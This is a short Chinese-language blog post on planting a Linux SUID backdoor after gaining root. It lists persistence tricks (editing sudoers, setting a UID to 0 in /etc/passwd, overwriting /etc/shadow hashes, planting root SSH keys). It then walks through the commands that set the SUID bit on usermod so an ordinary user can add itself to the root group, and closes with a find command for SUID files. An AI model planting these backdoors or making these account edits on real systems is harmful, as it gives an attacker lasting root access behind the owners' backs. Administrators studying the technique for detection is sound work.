Reber's Blog

只会一点点编程、只会一点点渗透


Linux 之 SUID 后门

SUID可以用来做后门,前提是你已经获取了root权限,且给予s权限的文件必须为二进制

0x00 为二进制文件添加s权限从而提升为root权限

  • 写sudoers添加用户 //最佳方案
  • vim /etc/passwd //将uid和gid改为0
  • vim /etc/shadow //密文覆盖
  • vim root .ssh/证书文件 .ssh这个文件夹和证书的权限要正确,要和原来一致

0x01 SUID主要作用可以是留后门

  • 在root权限下给usermod一个s权限
# which usermod   #得到usermod的路径                             
/usr/sbin/usermod
# chmod u+s /usr/sbin/usermod
# ls -l /usr/sbin/usermod
-rwsr-x---. 1 root root 98680 Dec  7  2011 /usr/sbin/usermod
  • usermod给其他人一个x权限
[root@localhost ~]# chmod o+x /usr/sbin/usermod
[root@localhost ~]# ls -l /usr/sbin/usermod
-rwsr-x--x. 1 root root 98680 Dec  7  2011 /usr/sbin/usermod
  • 切换到普通用户wyb
[wyb@localhost ~]$ id wyb
uid=500(wyb) gid=500(wyb) groups=500(wyb)
[wyb@localhost ~]$ usermod -g root wyb
[wyb@localhost ~]$ id wyb
uid=500(wyb) gid=0(root) groups=0(root)
[wyb@localhost ~]$ exit
  • 验证
重新用wyb连接,此时即为root权限
[wyb@localhost ~]$ cd /root  #若能切换到此目录即证明确实获得了root权限
[wyb@localhost root]$ ls
anaconda-ks.cfg  install.log  install.log.syslog

0x02 查找拥有s权限的文件

  • find / -perm -u=s -type f 2>/dev/null